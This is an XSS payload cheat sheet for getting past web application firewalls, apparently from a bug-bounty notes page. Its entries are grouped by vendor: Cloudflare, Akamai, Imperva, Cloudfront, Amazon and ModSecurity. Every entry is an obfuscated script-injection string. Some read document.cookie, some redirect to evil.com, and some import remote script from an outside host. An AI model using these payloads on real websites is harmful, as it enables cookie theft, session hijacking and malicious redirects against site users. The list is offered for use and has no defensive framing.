💣WAF Bypass Payloads

Source Code me URL or URL Script tag k ander a raha ha hum paylod laga dy gy

"-confirm(1)-"

// Bypass Akamai and Imperva WAF

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


// Cloudflare WAF bypass:

<Svg On Only=1 Onload=alert(1)>
<svg/onload=window["al"+"ert"]1337>
<img src=OnXSS OnError=alert(1)>
'"><img src=x onerrora=confirm() onerror=confirm(1)>
'"><svg onloado=confirm() onload=confirm(1) onloado=confirm()>
"%20>%20/*<Svg%20Only=1%20onmouseover=confirm()>*///
<Img Src=OnXSS OnError=confirm("XSS-Cloudflare-bypass-By-Asad")>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<Img Src=OnXSS OnError=confirm(document.cookie)>


<a AutoFocus contenteditable OnFocus=prompt`${origin}`>

<a AutoFocus contenteditable OnFocus="javascript​:prompt`${origin}`">
'"><svg/onload="location.replace('https://evil.com')"
tester<a href=http://evil.com>reopen your</a>
"location.replace('https://evil.com')"


<iframe src="javascript​:prompt`${origin}`" xss="">

<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
---------------------------------
// Akamai WAF bypass:

';k='e'%0Atop['al'+k+'rt'](1)//
1'"><A HRef=\" AutoFocus OnFocus=('ale'+'rt')(origin)>
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:top[/al/.source+/ert/.source](document.cookie)
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)> 
1'"><INPUT HRef=\" AutoFocus OnFocus="var a='ale';var b='rt';var c='()';top[a+b]`11`"><"
--------------------------------
// Imperva WAF bypass:

xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<svg/onload=self[`aler`%2b`t`]`1`>
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
--------------------------------
// Cloudfront WAF bypass:

">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
'""><Svg+OnLoad=(alert)(1)>
--------------------------------
// Amazon WAF Bypass:

%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%601%60%3E
<img%2Fsrc%2Fonerror%3D.1%7Calert%601%60>
<img/src/onerror=.1|alert`1`>
--------------------------------
// Mod security WAF bypass:

<svg onload='new Function["Y000!"].find(al\u0065rt)'>

Srored (Persistent) XSS Payloads

Last updated